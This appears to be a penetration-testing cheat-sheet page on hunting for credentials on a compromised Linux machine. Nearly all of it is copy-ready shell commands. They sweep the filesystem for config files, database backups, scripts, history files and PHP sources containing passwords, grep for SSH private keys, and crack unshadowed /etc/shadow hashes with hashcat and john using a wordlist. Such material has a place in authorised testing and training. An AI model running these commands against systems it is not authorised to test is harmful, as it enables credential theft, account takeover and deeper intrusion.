Linux Password Hunting

Common Password Attack on Linux Machine

Config Files Search

for l in $(echo ".conf .config .cnf");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "lib\|fonts\|share\|core" ;done

Credentials in Configuration Files

for i in $(find / -name *.cnf 2>/dev/null | grep -v "doc\|lib");do echo -e "\nFile: " $i; grep "user\|password\|pass" $i 2>/dev/null | grep -v "\#";done

Database Backup Search

for l in $(echo ".sql .db .*db .db*");do echo -e "\nDB File extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\|lib\|headers\|share\|man";done

Search Notes/txt Files

find /home/* -type f -name "*.txt"

Search Scripts on Linux

for l in $(echo ".py .pyc .pl .go .jar .c .sh");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\|lib\|headers\|share";done

Search Cronjob

cat /etc/crontab
ls -la /etc/cron.*/

Search SSH Private Key

grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1"
grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1"

File History

find / -type f -name "*history" 2>/dev/null
tail -n5 /home/*/.*_history*

Search Password in PHP Files

grep -iRl "password\|passwd" /var/www --include=*.php

Cracking Linux Credentials

# unshadow local creds
unshadow passwd.bak shadow.bak > unshadow.txt
# Perform Dictionary Attack
hashcat -m 1800 -a 0 unshadow.txt /usr/share/wordlists/rockyou.txt -o cracked_shadow

Take a look at the unshadow.txt file. The field after the username (with a number or letter between two dollar signs) is the one that identifies the hash type used. It could be one of the following:

$1$ is MD5
$2a$ is Blowfish
$2y$ is Blowfish
$5$ is SHA-256
$6$ is SHA-512
$y$ is yescrypt

For $y$, for example, you can use the command:

john --format=crypt --wordlist=/usr/share/wordlists/rockyou.txt unshadow.txt

Tools

PreviousLinux Post Exploitation NextSimple PHP Webshell

Last updated 21 days ago